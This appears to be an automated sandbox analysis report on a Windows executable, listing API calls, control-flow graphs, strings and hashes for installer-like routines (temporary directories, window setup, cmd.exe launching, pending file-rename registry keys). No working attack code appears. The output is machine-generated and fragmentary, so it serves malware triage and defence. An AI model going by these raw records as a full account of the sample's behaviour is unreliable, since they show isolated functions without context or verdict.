                                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                                            • String ID: Created temporary directory: $REGDLL_EXE$\_RegDLL.tmp$\_setup64.tmp$_isetup$oI$oI
                                                                                                            • API String ID: 1375471231-857235331
                                                                                                            • Opcode ID: cbcd31ce72f07627676fb358a31cf6d42b3233dd890dda5219184df80f66688f
                                                                                                            • Instruction ID: c69cc1ab8f896661f98e1b5ecb406916ff938ef434e98a02422d0df200dcf9d8
                                                                                                            • Opcode Fuzzy Hash: cbcd31ce72f07627676fb358a31cf6d42b3233dd890dda5219184df80f66688f
                                                                                                            • Instruction Fuzzy Hash: 45415C34A002099FCB04EFA5D992ADEB7B5EF48309F50843BE51477392DB389E058B99

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 2220 406334-40634e GetModuleHandleA GetProcAddress 2221 406350 2220->2221 2222 406357-406364 GetProcAddress 2220->2222 2221->2222 2223 406366 2222->2223 2224 40636d-40637a GetProcAddress 2222->2224 2223->2224 2225 406380-406381 2224->2225 2226 40637c-40637e SetProcessDEPPolicy 2224->2226 2226->2225
                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,00497084), ref: 0040633A
                                                                                                            • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00406347
                                                                                                            • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 0040635D
                                                                                                            • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 00406373
                                                                                                            • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00497084), ref: 0040637E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$HandleModulePolicyProcess
                                                                                                            • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                                            • API String ID: 3256987805-3653653586
                                                                                                            • Opcode ID: 2d072691014e9b17485d1139902ec2132fd60bbe123d67ee511500e2736c37f1
                                                                                                            • Instruction ID: d0a9e1fb4642b92a4408cab99680119fc9d423cfedcded744397bec81fc197df
                                                                                                            • Opcode Fuzzy Hash: 2d072691014e9b17485d1139902ec2132fd60bbe123d67ee511500e2736c37f1
                                                                                                            • Instruction Fuzzy Hash: C6E026A1380701ACEA1436F20D82F7B10488B40B64B2A14373D5AB91C3D9BDD92459BD

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 2227 423884-42388e 2228 4239b7-4239bb 2227->2228 2229 423894-4238b6 call 41f3d4 GetClassInfoA 2227->2229 2232 4238e7-4238f0 GetSystemMetrics 2229->2232 2233 4238b8-4238cf RegisterClassA 2229->2233 2235 4238f2 2232->2235 2236 4238f5-4238ff GetSystemMetrics 2232->2236 2233->2232 2234 4238d1-4238e2 call 408cc4 call 40311c 2233->2234 2234->2232 2235->2236 2238 423901 2236->2238 2239 423904-423960 call 403738 call 406300 call 403400 call 42365c SetWindowLongA 2236->2239 2238->2239 2250 423962-423975 call 424188 SendMessageA 2239->2250 2251 42397a-4239a8 GetSystemMenu DeleteMenu * 2 2239->2251 2250->2251 2251->2228 2253 4239aa-4239b2 DeleteMenu 2251->2253 2253->2228
                                                                                                            APIs
                                                                                                              • Part of subcall function 0041F3D4: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDB4,?,0042389F,00423C1C,0041EDB4), ref: 0041F3F2
                                                                                                            • GetClassInfoA.USER32(00400000,0042368C), ref: 004238AF
                                                                                                            • RegisterClassA.USER32(00498630), ref: 004238C7
                                                                                                            • GetSystemMetrics.USER32(00000000), ref: 004238E9
                                                                                                            • GetSystemMetrics.USER32(00000001), ref: 004238F8
                                                                                                            • SetWindowLongA.USER32(00410660,000000FC,0042369C), ref: 00423954
                                                                                                            • SendMessageA.USER32(00410660,00000080,00000001,00000000), ref: 00423975
                                                                                                            • GetSystemMenu.USER32(00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C,0041EDB4), ref: 00423980
                                                                                                            • DeleteMenu.USER32(00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C,0041EDB4), ref: 0042398F
                                                                                                            • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 0042399C
                                                                                                            • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000), ref: 004239B2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 183575631-0
                                                                                                            • Opcode ID: 916a691b4847f15f2edf33caba05564c21d5fb92d0a77b447c88d0b46adfa804
                                                                                                            • Instruction ID: a1bb8b483c6051ae977dcd30bc5d6258be0549d98267ef4ab912faaf57b8e79c
                                                                                                            • Opcode Fuzzy Hash: 916a691b4847f15f2edf33caba05564c21d5fb92d0a77b447c88d0b46adfa804
                                                                                                            • Instruction Fuzzy Hash: 463184B17402006AEB10BF65DC82F6636A89B15308F10017BFA40EF2D7CABDDD40876D

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 2255 42f3d4-42f3de 2256 42f3e0-42f3e3 call 402d30 2255->2256 2257 42f3e8-42f425 call 402b30 GetActiveWindow GetFocus call 41eeb4 2255->2257 2256->2257 2263 42f437-42f43f 2257->2263 2264 42f427-42f431 RegisterClassA 2257->2264 2265 42f4c6-42f4e2 SetFocus call 403400 2263->2265 2266 42f445-42f476 CreateWindowExA 2263->2266 2264->2263 2266->2265 2267 42f478-42f4bc call 42428c call 403738 CreateWindowExA 2266->2267 2267->2265 2274 42f4be-42f4c1 ShowWindow 2267->2274 2274->2265
                                                                                                            APIs
                                                                                                            • GetActiveWindow.USER32 ref: 0042F403
                                                                                                            • GetFocus.USER32 ref: 0042F40B
                                                                                                            • RegisterClassA.USER32(004987AC), ref: 0042F42C
                                                                                                            • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042F500,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042F46A
                                                                                                            • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042F4B0
                                                                                                            • ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F4C1
                                                                                                            • SetFocus.USER32(00000000,00000000,0042F4E3,?,?,?,00000001,00000000,?,00457A52,00000000,0049A628), ref: 0042F4C8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$CreateFocus$ActiveClassRegisterShow
                                                                                                            • String ID: TWindowDisabler-Window
                                                                                                            • API String ID: 3167913817-1824977358
                                                                                                            • Opcode ID: c7a7adc83155a0351196465afd34f02b227be391187f6a34a24c1e4424dacc7e
                                                                                                            • Instruction ID: a85808fe2fc477e6bfefb4b7344e4229cc17534778a3dce562db4a9d559d1a3d
                                                                                                            • Opcode Fuzzy Hash: c7a7adc83155a0351196465afd34f02b227be391187f6a34a24c1e4424dacc7e
                                                                                                            • Instruction Fuzzy Hash: 6921A371740710BAE220EF619D03F1B76A4EB14B44FA0813BF904AB2D1D7BC6D5486EE

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 2275 452850-4528a1 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 2276 4528a3-4528aa 2275->2276 2277 4528ac-4528ae 2275->2277 2276->2277 2278 4528b0 2276->2278 2279 4528b2-4528e8 call 42e2bc call 42e73c call 403400 2277->2279 2278->2279
                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528E9,?,?,?,?,00000000,?,004970C5), ref: 00452870
                                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452876
                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528E9,?,?,?,?,00000000,?,004970C5), ref: 0045288A
                                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452890
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                            • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                                            • API String ID: 1646373207-2130885113
                                                                                                            • Opcode ID: 5506a4263b1eff634ed0d2217251898cb45e1d8087d76cbb7271a2c362ce8048
                                                                                                            • Instruction ID: 1764834aba405073ceae9d3f2b1e241b80e40901185f6bd62a0f27775e5f306d
                                                                                                            • Opcode Fuzzy Hash: 5506a4263b1eff634ed0d2217251898cb45e1d8087d76cbb7271a2c362ce8048
                                                                                                            • Instruction Fuzzy Hash: DB0188B0300300EED701BBA29D03B9B3A58EB56725F50443BF80066287D7FC4909DABD
                                                                                                            APIs
                                                                                                            • SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 0046693B
                                                                                                            • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00466961
                                                                                                              • Part of subcall function 004667D8: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 00466870
                                                                                                              • Part of subcall function 004667D8: DestroyCursor.USER32(00000000), ref: 00466886
                                                                                                            • ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004669B8
                                                                                                            • SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 00466A19
                                                                                                            • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00466A3F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Icon$Extract$FileInfo$CursorDestroyDraw
                                                                                                            • String ID: c:\directory$shell32.dll
                                                                                                            • API String ID: 3376378930-1375355148
                                                                                                            • Opcode ID: 7864bbd64ffcc0b4d3402a699463e3004b4bbc59a4beffd4c3fd38ea4829321b
                                                                                                            • Instruction ID: bf7570f26ded7c71d3219d2a7bb3c54f33771564a32a8265e6d4c0c3f8c9e6f1
                                                                                                            • Opcode Fuzzy Hash: 7864bbd64ffcc0b4d3402a699463e3004b4bbc59a4beffd4c3fd38ea4829321b
                                                                                                            • Instruction Fuzzy Hash: A1517070600248AFDB10DFA5CD89FDE77E9EB49344F5181B7B908AB351D638AE80CB59
                                                                                                            APIs
                                                                                                            • RegisterClipboardFormatA.USER32(commdlg_help), ref: 004307BC
                                                                                                            • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 004307CB
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 004307E5
                                                                                                            • GlobalAddAtomA.KERNEL32(00000000), ref: 00430806
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
                                                                                                            • String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
                                                                                                            • API String ID: 4130936913-2943970505
                                                                                                            • Opcode ID: 286d819e49dc31bff7363ce272760638a3e9e634710abf7e83810de7db046942
                                                                                                            • Instruction ID: a6afac4a95f2c597deb8a3c09a724b63b9622156ea849986cff8ddd49ab29b56
                                                                                                            • Opcode Fuzzy Hash: 286d819e49dc31bff7363ce272760638a3e9e634710abf7e83810de7db046942
                                                                                                            • Instruction Fuzzy Hash: 68F082705583408ED700FB2588027197BE4EB98308F044A7FB498A62E1D77E8510CB9F
                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,00454748,00454748,?,00454748,00000000), ref: 004546D6
                                                                                                            • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,00454748,00454748,?,00454748), ref: 004546E3
                                                                                                              • Part of subcall function 00454498: WaitForInputIdle.USER32(?,00000032), ref: 004544C4
                                                                                                              • Part of subcall function 00454498: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 004544E6
                                                                                                              • Part of subcall function 00454498: GetExitCodeProcess.KERNEL32(?,?), ref: 004544F5
                                                                                                              • Part of subcall function 00454498: CloseHandle.KERNEL32(?,00454522,0045451B,?,?,?,00000000,?,?,004546F7,?,?,?,00000044,00000000,00000000), ref: 00454515
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
                                                                                                            • String ID: .bat$.cmd$COMMAND.COM" /C $D$SuG$cmd.exe" /C "
                                                                                                            • API String ID: 854858120-3415487018
                                                                                                            • Opcode ID: 23eb109447d9d06895efbe1d143337b311b109ade6801299bf742d5fbdea7e55
                                                                                                            • Instruction ID: 0ceb2650e422503ffbc7ed56c7a183e4ec77644398bdd85e9c3e3b3e3b1edd4a
                                                                                                            • Opcode Fuzzy Hash: 23eb109447d9d06895efbe1d143337b311b109ade6801299bf742d5fbdea7e55
                                                                                                            • Instruction Fuzzy Hash: 17517F34A0034D6BCB01EF95C881BDDBBB9AF45309F51443BF8047B246D77C9A498759
                                                                                                            APIs
                                                                                                            • LoadIconA.USER32(00400000,MAINICON), ref: 0042372C
                                                                                                            • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 00423759
                                                                                                            • OemToCharA.USER32(?,?), ref: 0042376C
                                                                                                            • CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 004237AC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Char$FileIconLoadLowerModuleName
                                                                                                            • String ID: 2$MAINICON
                                                                                                            • API String ID: 3935243913-3181700818
                                                                                                            • Opcode ID: 74ccb24d7ebd2ab93e1510b14834e5329cf565851bcf20c48a8ce73befd404fd
                                                                                                            • Instruction ID: 37f11e164b18fdaff452b8e89fdec3e7ced50b804c3530562fc3ce32e09f0af8
                                                                                                            • Opcode Fuzzy Hash: 74ccb24d7ebd2ab93e1510b14834e5329cf565851bcf20c48a8ce73befd404fd
                                                                                                            • Instruction Fuzzy Hash: BF319370A042549ADF10EF2988857C67BE8AF14308F4441BAE844DB393D7BED988CB95
                                                                                                            APIs
                                                                                                            • GetCurrentProcessId.KERNEL32(00000000), ref: 00418F4D
                                                                                                            • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F6E
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00418F89
                                                                                                            • GlobalAddAtomA.KERNEL32(00000000), ref: 00418FAA
                                                                                                              • Part of subcall function 004230D8: 73A1A570.USER32(00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 0042312E
                                                                                                              • Part of subcall function 004230D8: EnumFontsA.GDI32(00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 00423141
                                                                                                              • Part of subcall function 004230D8: 73A24620.GDI32(00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423149
                                                                                                              • Part of subcall function 004230D8: 73A1A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423154
                                                                                                              • Part of subcall function 0042369C: LoadIconA.USER32(00400000,MAINICON), ref: 0042372C
                                                                                                              • Part of subcall function 0042369C: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 00423759
                                                                                                              • Part of subcall function 0042369C: OemToCharA.USER32(?,?), ref: 0042376C
                                                                                                              • Part of subcall function 0042369C: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 004237AC
                                                                                                              • Part of subcall function 0041F128: GetVersion.KERNEL32(?,00419000,00000000,?,?,?,00000001), ref: 0041F136
                                                                                                              • Part of subcall function 0041F128: SetErrorMode.KERNEL32(00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F152
                                                                                                              • Part of subcall function 0041F128: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F15E
                                                                                                              • Part of subcall function 0041F128: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F16C
                                                                                                              • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F19C
                                                                                                              • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1C5
                                                                                                              • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1DA
                                                                                                              • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1EF
                                                                                                              • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F204
                                                                                                              • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F219
                                                                                                              • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F22E
                                                                                                              • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F243
                                                                                                              • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F258
                                                                                                              • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F26D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$A24620A480A570EnumFileFontsIconLibraryLowerModuleNameProcessThreadVersion
                                                                                                            • String ID: ControlOfs%.8X%.8X$Delphi%.8X
                                                                                                            • API String ID: 3864787166-2767913252
                                                                                                            • Opcode ID: 4b1039f7c2ed13802eb740582532c433a8c58bd120a281f680ebe107a2bb77c7
                                                                                                            • Instruction ID: 8205fbe5be641bff71b9ea3a28b72145380c35a95610ff2efd46362842c0834c
                                                                                                            • Opcode Fuzzy Hash: 4b1039f7c2ed13802eb740582532c433a8c58bd120a281f680ebe107a2bb77c7
                                                                                                            • Instruction Fuzzy Hash: C1112EB06142409AC740FF76994268A7BE19B6431CF40943FF888EB2D1DB7D99548B5F
                                                                                                            APIs
                                                                                                            • SetWindowLongA.USER32(?,000000FC,?), ref: 00413674
                                                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 0041367F
                                                                                                            • GetWindowLongA.USER32(?,000000F4), ref: 00413691
                                                                                                            • SetWindowLongA.USER32(?,000000F4,?), ref: 004136A4
                                                                                                            • SetPropA.USER32(?,00000000,00000000), ref: 004136BB
                                                                                                            • SetPropA.USER32(?,00000000,00000000), ref: 004136D2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LongWindow$Prop
                                                                                                            • String ID:
                                                                                                            • API String ID: 3887896539-0
                                                                                                            • Opcode ID: f3fe35187a7c1c9d5e5b286bbae8f081611be039bb05b0364af94d978d137136
                                                                                                            • Instruction ID: 1bc0ad651c9199286e8a44efdb6fe1d3d914d8875e882f3995fbdb6b4a12be9e
                                                                                                            • Opcode Fuzzy Hash: f3fe35187a7c1c9d5e5b286bbae8f081611be039bb05b0364af94d978d137136
                                                                                                            • Instruction Fuzzy Hash: BD11DD75500244BFDB00DF9DDC84E9A3BECEB19364F104676B918DB2A1D738D990CB94
                                                                                                            APIs
                                                                                                              • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00454D8B,?,00000000,00454DCB), ref: 00454CD1
                                                                                                            Strings
                                                                                                            • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00454C54
                                                                                                            • PendingFileRenameOperations, xrefs: 00454C70
                                                                                                            • WININIT.INI, xrefs: 00454D00
                                                                                                            • PendingFileRenameOperations2, xrefs: 00454CA0
                                                                                                            Memory Dump Source
